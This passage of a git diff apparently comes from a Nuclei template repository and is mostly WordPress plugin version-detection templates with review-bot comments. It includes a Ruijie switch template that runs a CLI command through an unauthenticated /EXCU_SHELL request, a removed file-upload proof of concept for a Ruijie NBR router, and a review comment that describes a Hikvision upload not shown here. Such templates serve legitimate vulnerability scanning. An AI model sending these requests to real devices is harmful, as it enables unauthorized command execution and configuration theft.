b/poc/other/Ruijie_EXCU_SHELL.yaml 
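Review bot: The file is still named Hikvision_Env_Information_Leakage.yaml but after this hunk it no longer touches `/artemis-portal/artemis/env`; it uploads a JSP via `/center/api/files;.html`, so the filename, and the `id: HiKVISION` it shares with Hikvision_iVMS-8700_Fileupload_report.yaml in this same commit, both misdescribe it. Rename the file (e.g. `hikvision-center-files-upload.yaml`) and give it a unique id. The `;.html` suffix on the POST path is unexplained; if it is required for the request to be accepted, say so in `description` so a maintainer does not normalise it away.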
@@ -1,37 +1,33 @@ id: Ruijie info: - name: Ruijie NBR Router fileupload.php Arbitrary File Upload Vulnerability + name: Ruijie Switch WEB Management System EXCU_ SHELL author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - Ruijie NBR router has an arbitrary file upload vulnerability in the fileupload.php file, which allows attackers to upload arbitrary files to the server and obtain server privileges + Ruijie Switch WEB Management System EXCU_ SHELL metadata: - fofa-query: app="Ruijie-NBR路由器" - hunter-query: web.title="锐捷网络 --NBR路由器--登录界面" + fofa-query: body="img/free_login_ge.gif" && body="./img/login_bg.gif" + hunter-query: web.body="img/free_login_ge.gif"&&body="./img/login_bg.gif" http: - raw: - | - POST /ddi/server/fileupload.php?uploadDir=../../321&name=test.php HTTP/1.1 + GET /EXCU_SHELL HTTP/1.1 Host: {{Hostname}} - Accept: text/plain, */*; q=0.01 - Content-Disposition: form-data; name="file"; filename="111.php" - Content-Type: image/jpeg + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Cmdnum: '1' + Command1: show running-config + Confirm1: n - - - | - GET /321/test.php HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'status_code_2 == 200' - - 'contains(body_1, "test.php")' - - 'contains(body_2, "PHP Version")' + - 'contains(body_1, "configuration")' condition: and diff --git a/poc/other/ai-engine-3bae955ccade96ed3bb2f0c913880abb.yaml b/poc/other/ai-engine-3bae955ccade96ed3bb2f0c913880abb.yaml new file mode 100644 index 0000000000..237d47551f --- /dev/null +++ b/poc/other/ai-engine-3bae955ccade96ed3bb2f0c913880abb.yaml 
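Review bot: `description: Ruijie Switch WEB Management System EXCU_ SHELL` just repeats `name` and says nothing about what the template checks or its impact, whereas the removed description explained the old check. Write it along the lines of `description: The Ruijie switch web management system exposes an /EXCU_SHELL endpoint that runs CLI commands supplied in request headers (Cmdnum, Command1) without any session or credentials; the template requests the running configuration and matches on the returned output.` `req-condition: true` is left over from the two-request version and is unnecessary with a single request. `contains(body_1, "configuration")` is a loose success signal that a generic error page mentioning configuration would also satisfy; matching on a token that only appears in a configuration dump would be more precise.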
@@ -0,0 +1,59 @@ +id: ai-engine-3bae955ccade96ed3bb2f0c913880abb + +info: + name: > + AI Engine <= 2.5.0 - Authenticated (Admin+) Remote Code Execution + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d9f6b761-9c4b-4dcc-885d-9a5b4e8e534d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ai-engine/" + google-query: inurl:"/wp-content/plugins/ai-engine/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ai-engine,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ai-engine/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ai-engine" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.0') \ No newline at end of file diff --git a/poc/other/auxin-portfolio-937e73528345004677d696748421a9a3.yaml b/poc/other/auxin-portfolio-937e73528345004677d696748421a9a3.yaml new file mode 100644 index 0000000000..16798fecde --- /dev/null +++ b/poc/other/auxin-portfolio-937e73528345004677d696748421a9a3.yaml 
@@ -0,0 +1,59 @@ +id: auxin-portfolio-937e73528345004677d696748421a9a3 + +info: + name: > + Premium Portfolio Features for Phlox theme <= 2.3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4475cbd4-07cf-499a-a11a-b63eb9184568?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/auxin-portfolio/" + google-query: inurl:"/wp-content/plugins/auxin-portfolio/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,auxin-portfolio,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/auxin-portfolio/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "auxin-portfolio" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.3') \ No newline at end of file diff --git a/poc/other/beaver-builder-lite-version-7f5f101995ccdcf10c7e7f5808c934b6.yaml b/poc/other/beaver-builder-lite-version-7f5f101995ccdcf10c7e7f5808c934b6.yaml new file mode 100644 index 0000000000..693c1ab306 --- /dev/null +++ b/poc/other/beaver-builder-lite-version-7f5f101995ccdcf10c7e7f5808c934b6.yaml 
@@ -0,0 +1,59 @@ +id: beaver-builder-lite-version-7f5f101995ccdcf10c7e7f5808c934b6 + +info: + name: > + Beaver Builder (Lite Version) <= 2.8.3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via type Parameter + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f83db067-843f-4dd8-b5d1-83e95c6c88cc?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/beaver-builder-lite-version/" + google-query: inurl:"/wp-content/plugins/beaver-builder-lite-version/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,beaver-builder-lite-version,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/beaver-builder-lite-version/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "beaver-builder-lite-version" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.3.5') \ No newline at end of file diff --git a/poc/other/booking-system-8649e5bc1fc86fb49801894149b7194d.yaml b/poc/other/booking-system-8649e5bc1fc86fb49801894149b7194d.yaml new file mode 100644 index 0000000000..a65384de78 --- /dev/null +++ b/poc/other/booking-system-8649e5bc1fc86fb49801894149b7194d.yaml 
@@ -0,0 +1,59 @@ +id: booking-system-8649e5bc1fc86fb49801894149b7194d + +info: + name: > + Pinpoint Booking System <= 2.9.9.4.7 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fe3c897a-c3fb-4d1f-ad4c-c1bbb781a5aa?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/booking-system/" + google-query: inurl:"/wp-content/plugins/booking-system/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,booking-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/booking-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "booking-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.9.9.4.7') \ No newline at end of file diff --git a/poc/other/chained-quiz-e57df0d2ff1d620125911e7a7435441f.yaml b/poc/other/chained-quiz-e57df0d2ff1d620125911e7a7435441f.yaml new file mode 100644 index 0000000000..ef4ce828ee --- /dev/null +++ b/poc/other/chained-quiz-e57df0d2ff1d620125911e7a7435441f.yaml 
@@ -0,0 +1,59 @@ +id: chained-quiz-e57df0d2ff1d620125911e7a7435441f + +info: + name: > + Chained Quiz <= 1.3.2.8 - Missing Authorization + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/69bc3b17-87fd-4e69-b769-85bbf13b214e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/chained-quiz/" + google-query: inurl:"/wp-content/plugins/chained-quiz/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,chained-quiz,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/chained-quiz/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "chained-quiz" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.2.8') \ No newline at end of file diff --git a/poc/other/ditty-news-ticker-707207d8728290146b99c3b10fa2d8a1.yaml b/poc/other/ditty-news-ticker-707207d8728290146b99c3b10fa2d8a1.yaml new file mode 100644 index 0000000000..ecf93df2c8 --- /dev/null +++ b/poc/other/ditty-news-ticker-707207d8728290146b99c3b10fa2d8a1.yaml 
@@ -0,0 +1,59 @@ +id: ditty-news-ticker-707207d8728290146b99c3b10fa2d8a1 + +info: + name: > + Ditty 3.1.39 - 3.1.45 - Authenticated (Author+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/80f32108-16a5-478f-9966-7153735cad6d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ditty-news-ticker/" + google-query: inurl:"/wp-content/plugins/ditty-news-ticker/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ditty-news-ticker,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ditty-news-ticker/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ditty-news-ticker" + part: body + + - type: dsl + dsl: + - compare_versions(version, '>= 3.1.39', '<= 3.1.45') \ No newline at end of file diff --git a/poc/other/dom-invaider.yaml b/poc/other/dom-invaider.yaml index b720bd8f88..4dc7a3f7be 100644 --- a/poc/other/dom-invaider.yaml +++ b/poc/other/dom-invaider.yaml 
@@ -1,28 +1,20 @@ id: dom-xss - info: - name: DOM Invader - Cross-Site Scripting + name: DOM XSS Sources & Sinks author: geeknik - severity: high - description: DOM Invader contains a cross-site scripting vulnerability in Sources & Sinks functionality. + severity: info reference: - Inspired by https://portswigger.net/blog/introducing-dom-invader - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 tags: xss,file file: - extensions: - js - ts - html - - htm - php - cs - rb - py - extractors: - type: regex name: sink @@ -42,7 +34,6 @@ file: - 'location(\.href|\.replace|\.assign|\.pathname|\.protocol|\.host|\.hostname|\.hash|\.search)?' - 'iframe(\.srcdoc|\.src)' - 'xhr(\.open|\.send|\.setRequestHeader(\.name|\.value)?)' - - type: regex name: source part: body @@ -50,5 +41,3 @@ file: - 'location(\.href|\.hash|\.search|\.pathname)?' - 'window\.name' - 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)' - -# digest: 4a0a004730450220156c7817e33c48d906821587c273a5b1ecd3ed8996c0616e7468f27a46d04aec022100893e4c2dce9b2668a6643dd2fbe05f4a536c3b2df1e7223d971503333da4fb7f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/front-end-only-users-90df2a922aebe8c48da99b7fe999c319.yaml b/poc/other/front-end-only-users-90df2a922aebe8c48da99b7fe999c319.yaml new file mode 100644 index 0000000000..3569f46c35 --- /dev/null +++ b/poc/other/front-end-only-users-90df2a922aebe8c48da99b7fe999c319.yaml 
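Review bot: After the retitle the template has no `description` at all, and with `severity: info` and `classification` removed a reader of a hit no longer learns that matches are candidate sources and sinks for manual review rather than confirmed XSS; add `description: Flags common DOM XSS source and sink patterns in local source files for manual review; a match is not a confirmed vulnerability.` under `info`. Dropping `htm` from `extensions` while keeping `html` looks unrelated to the retitle — if unintentional, restore it, since `.htm` files carry the same inline scripts. The `sink` and `source` extractor bodies continue outside this hunk.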
@@ -0,0 +1,59 @@ +id: front-end-only-users-90df2a922aebe8c48da99b7fe999c319 + +info: + name: > + Front End Users <= 3.2.28 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/048ea84c-0d53-434b-ae49-d804ec1de8c4?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/front-end-only-users/" + google-query: inurl:"/wp-content/plugins/front-end-only-users/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,front-end-only-users,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/front-end-only-users/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "front-end-only-users" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.28') \ No newline at end of file diff --git a/poc/other/funnel-builder-pro-eb1e588869835492ad97803c9c5af7ab.yaml b/poc/other/funnel-builder-pro-eb1e588869835492ad97803c9c5af7ab.yaml new file mode 100644 index 0000000000..3a964fd79f --- /dev/null +++ b/poc/other/funnel-builder-pro-eb1e588869835492ad97803c9c5af7ab.yaml 
@@ -0,0 +1,59 @@ +id: funnel-builder-pro-eb1e588869835492ad97803c9c5af7ab + +info: + name: > + Funnel Kit Funnel Builder PRO <= 3.4.5 Authenticated(Contributor+) Stored Cross-Site Scripting via allow_iframe_tag_in_post + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2fbacaf2-0b3e-4d1e-adc3-c501a6c4c816?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/funnel-builder-pro/" + google-query: inurl:"/wp-content/plugins/funnel-builder-pro/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,funnel-builder-pro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/funnel-builder-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "funnel-builder-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.4.5') \ No newline at end of file diff --git a/poc/other/give-5a41f38fc1abdcc291ed6c8ada86ceb0.yaml b/poc/other/give-5a41f38fc1abdcc291ed6c8ada86ceb0.yaml new file mode 100644 index 0000000000..838105557d --- /dev/null +++ b/poc/other/give-5a41f38fc1abdcc291ed6c8ada86ceb0.yaml 
@@ -0,0 +1,59 @@ +id: give-5a41f38fc1abdcc291ed6c8ada86ceb0 + +info: + name: > + GiveWP <= 3.15.1 - Unauthenticated Full Path Disclosure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2a13ce09-b312-4186-b0e2-63065c47f15d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/give/" + google-query: inurl:"/wp-content/plugins/give/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,give,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/give/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "give" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.15.1') \ No newline at end of file diff --git a/poc/other/infolinks-ad-wrap-ac5f97e3e98b5cccd5e941c630594293.yaml b/poc/other/infolinks-ad-wrap-ac5f97e3e98b5cccd5e941c630594293.yaml new file mode 100644 index 0000000000..cf234474bf --- /dev/null +++ b/poc/other/infolinks-ad-wrap-ac5f97e3e98b5cccd5e941c630594293.yaml 
@@ -0,0 +1,59 @@ +id: infolinks-ad-wrap-ac5f97e3e98b5cccd5e941c630594293 + +info: + name: > + infolinks Ad Wrap <= 1.0.2 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1ee41498-f5c6-48c3-a0db-55a1fe6e7f92?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/infolinks-ad-wrap/" + google-query: inurl:"/wp-content/plugins/infolinks-ad-wrap/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,infolinks-ad-wrap,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/infolinks-ad-wrap/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "infolinks-ad-wrap" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/other/media-library-plus-305e1ca5563918c203ad44639d735fe6.yaml b/poc/other/media-library-plus-305e1ca5563918c203ad44639d735fe6.yaml new file mode 100644 index 0000000000..90b7f04eda --- /dev/null +++ b/poc/other/media-library-plus-305e1ca5563918c203ad44639d735fe6.yaml 
@@ -0,0 +1,59 @@ +id: media-library-plus-305e1ca5563918c203ad44639d735fe6 + +info: + name: > + Media Library Folders <= 8.2.2 - Authenticated (Subscriber+) Second-Order SQL Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d2266254-9281-4859-8630-f7bb5c0ead19?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/media-library-plus/" + google-query: inurl:"/wp-content/plugins/media-library-plus/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,media-library-plus,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/media-library-plus/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "media-library-plus" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 8.2.2') \ No newline at end of file diff --git a/poc/other/mobile-security-framework.yaml b/poc/other/mobile-security-framework.yaml new file mode 100644 index 0000000000..39a342c547 --- /dev/null +++ b/poc/other/mobile-security-framework.yaml @@ -0,0 +1,20 @@ +id: mobile-security-framework +info: + name: mobile-security-framework + author: cn-kali-team + tags: detect,tech,mobile-security-framework + severity: info + metadata: + fofa-query: + - title="mobsf" + product: mobile-security-framework + vendor: mobsf_project + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: regex + regex: + - (?mi)]*>mobsf.*? 
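Review bot: The only matcher regex in the mobile-security-framework template, shown here as `(?mi)]*>mobsf.*?`, ends in a lazy `.*?` that can match nothing and so adds no anchoring, and its `]*>` prefix reads like the tail of a `<title[^>]*>` pattern whose tag was lost somewhere between the file and this view — check the committed file and, if the pattern really is what the hunk shows, anchor it, e.g. `- (?mi)<title[^>]*>mobsf.*?</title>`. `fofa-query` is written as a list here while every other template in this patch uses a scalar string; keep one form. Adding `part: body` to the matcher would make the intended response part explicit.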
diff --git a/poc/other/mp3-music-player-by-sonaar-d5f0e031999dc4b1252ad5515dddcfaf.yaml b/poc/other/mp3-music-player-by-sonaar-d5f0e031999dc4b1252ad5515dddcfaf.yaml new file mode 100644 index 0000000000..0b05978cee --- /dev/null +++ b/poc/other/mp3-music-player-by-sonaar-d5f0e031999dc4b1252ad5515dddcfaf.yaml @@ -0,0 +1,59 @@ +id: mp3-music-player-by-sonaar-d5f0e031999dc4b1252ad5515dddcfaf + +info: + name: > + MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar <= 5.7.0.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Deletion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/43adc9dd-1780-440f-90c2-ff05a22eb084?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/mp3-music-player-by-sonaar/" + google-query: inurl:"/wp-content/plugins/mp3-music-player-by-sonaar/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,mp3-music-player-by-sonaar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mp3-music-player-by-sonaar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mp3-music-player-by-sonaar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.7.0.1') \ No newline at end of file diff --git a/poc/other/premium-seo-pack-016f4f965dace571e947d960d2934b03.yaml b/poc/other/premium-seo-pack-016f4f965dace571e947d960d2934b03.yaml new file mode 100644 index 0000000000..0bd9b14b76 --- /dev/null +++ b/poc/other/premium-seo-pack-016f4f965dace571e947d960d2934b03.yaml 
@@ -0,0 +1,59 @@ +id: premium-seo-pack-016f4f965dace571e947d960d2934b03 + +info: + name: > + Premium SEO Pack – WP SEO Plugin <= 1.6.001 - Unauthenticated Information Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ccb65de5-bfb5-47db-87c9-ad46e65924b8?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/premium-seo-pack/" + google-query: inurl:"/wp-content/plugins/premium-seo-pack/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,premium-seo-pack,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/premium-seo-pack/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "premium-seo-pack" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.001') \ No newline at end of file diff --git a/poc/other/quiz-master-next-a245f156676109e1d14f3370b00c9905.yaml b/poc/other/quiz-master-next-a245f156676109e1d14f3370b00c9905.yaml new file mode 100644 index 0000000000..022343c4bb --- /dev/null +++ b/poc/other/quiz-master-next-a245f156676109e1d14f3370b00c9905.yaml 
@@ -0,0 +1,59 @@ +id: quiz-master-next-a245f156676109e1d14f3370b00c9905 + +info: + name: > + Quiz and Survey Master (QSM) <= 9.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9a87f0a2-42b0-4536-b4d1-83a9f6ed4262?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/quiz-master-next/" + google-query: inurl:"/wp-content/plugins/quiz-master-next/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,quiz-master-next,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/quiz-master-next/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "quiz-master-next" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 9.1.0') \ No newline at end of file diff --git a/poc/other/ratings-shorttags-3f67e2b8c30c94499ec4eae8289c70a2.yaml b/poc/other/ratings-shorttags-3f67e2b8c30c94499ec4eae8289c70a2.yaml new file mode 100644 index 0000000000..27993021c8 --- /dev/null +++ b/poc/other/ratings-shorttags-3f67e2b8c30c94499ec4eae8289c70a2.yaml 
@@ -0,0 +1,59 @@ +id: ratings-shorttags-3f67e2b8c30c94499ec4eae8289c70a2 + +info: + name: > + Review Ratings <= 1.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8f890790-c5ca-4812-9566-6c945d8f39b5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ratings-shorttags/" + google-query: inurl:"/wp-content/plugins/ratings-shorttags/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ratings-shorttags,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ratings-shorttags/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ratings-shorttags" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6') \ No newline at end of file diff --git a/poc/other/registrations-for-the-events-calendar-cff64aa365787e00304f119ad6984b45.yaml b/poc/other/registrations-for-the-events-calendar-cff64aa365787e00304f119ad6984b45.yaml new file mode 100644 index 0000000000..344eabb0f0 --- /dev/null +++ b/poc/other/registrations-for-the-events-calendar-cff64aa365787e00304f119ad6984b45.yaml 
@@ -0,0 +1,59 @@ +id: registrations-for-the-events-calendar-cff64aa365787e00304f119ad6984b45 + +info: + name: > + Registrations for the Events Calendar – Event Registration Plugin <= 2.12.2 - Authenticated (Contributor+) SQL Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/26e35c4a-79ec-4742-8004-1c799d2c56ff?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/registrations-for-the-events-calendar/" + google-query: inurl:"/wp-content/plugins/registrations-for-the-events-calendar/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,registrations-for-the-events-calendar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/registrations-for-the-events-calendar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - 